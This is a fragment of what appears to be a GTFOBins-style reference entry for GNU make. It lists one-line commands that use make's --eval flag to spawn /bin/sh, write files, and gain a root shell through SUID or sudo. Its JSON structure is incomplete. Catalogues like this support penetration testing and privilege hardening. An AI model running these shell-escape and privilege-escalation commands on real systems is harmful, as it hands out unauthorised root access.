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"description": "All these examples only work with GNU 'make' due to the lack of support of the '--eval' flag. The same can be achieved by using a proper 'Makefile' or by passing the content via stdin using '-f -'.",
"functions": {
"shell": [
"code": "make -s --eval=$'x:\\n\\t-'\"/bin/sh\"\n"
"file-write": [
"description": "Requires a newer GNU 'make' version.",
"code": "make -s --eval=\"\\$(file >[file],DATA)\" .\n"
"suid": [
"code": "./make -s --eval=$'x:\\n\\t-'\"/bin/sh -p\"\n"
"sudo": [
"code": "sudo make -s --eval=$'x:\\n\\t-'\"/bin/sh\"\n"